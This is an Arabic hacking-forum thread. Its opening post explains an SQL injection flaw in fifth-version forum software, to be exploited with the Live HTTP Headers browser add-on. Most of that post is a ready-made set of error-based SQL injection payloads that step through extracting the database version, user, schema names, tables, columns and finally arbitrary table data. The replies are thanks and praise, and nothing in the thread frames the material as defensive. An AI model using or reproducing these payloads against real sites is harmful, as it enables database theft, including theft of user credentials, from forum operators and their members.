حالة الموضوع:
مغلق
  1. Spamber Dz

    Spamber Dz Developer

    الأنتساب:
    ‏30 ديسمبر 2012
    المشاركات:
    56
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    Dz
    السلام عليكم ورحمة الله وبركاته

    شرح ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    الفديو

    [YOUTUBE]b2_UCsX1nWw[/YOUTUBE]

    لاداه : Live HTTP Headers

    رابط الاداه لمتصفح فايرفوكس
    [NOTE]https://addons.mozilla.org/en/firefox/addon/live-http-headers/[/NOTE]
    بعض الحركات المستخدمه في الشرح

    كود PHP:
    *********************************************************************************************************************
    |
    Version():
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |
    User():
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |
    Database():
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************


     *********************************************************************************************************************
    |
    Database Print:
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7eFROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |
    Table Count:
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7eFROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |Print 
    Tables:
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7eFROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |
    Columns of selected table:
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7eFROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |
    Fetch Out Data:
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7eFROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************
     
  2. ملـك بدون مملكه

    ملـك بدون مملكه DeveloPer Plus

    الأنتساب:
    ‏11 ديسمبر 2011
    المشاركات:
    101
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    الإقامة:
    لـــبـــنـــان صـــيــدا
    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    الله يعطيك الف عافية اخوي
     
  3. R0CKO

    R0CKO Developer

    الأنتساب:
    ‏8 يوليو 2012
    المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    ســــ(حـرة)ــوريــة اّبيــــــــــة
    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    السلام عليكم
    تسلم يا غالي
     
  4. Ahmed Hamody

    Ahmed Hamody ExpErt DeveloPer

    الأنتساب:
    ‏24 نوفمبر 2012
    المشاركات:
    74
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    مش هقول اني من مصر
    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    دايم بطل ومبدع يا صاحبي واصل
     
  5. intel

    intel Developer

    الأنتساب:
    ‏3 ديسمبر 2012
    المشاركات:
    74
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    موفقـ..
     
  6. Red Virus

    Red Virus Developer

    الأنتساب:
    ‏4 ديسمبر 2012
    المشاركات:
    60
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    الف شكر لك يالغالي

    جعلها بميزان حسناتك
     
  7. Egy HacKerS

    Egy HacKerS DeveloPer Plus

    الأنتساب:
    ‏1 ديسمبر 2012
    المشاركات:
    113
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الوظيفة:
    HacKer
    الإقامة:
    Egy
    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    احسنت اخى الكريم

    موضوع فى قمة الافاده
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة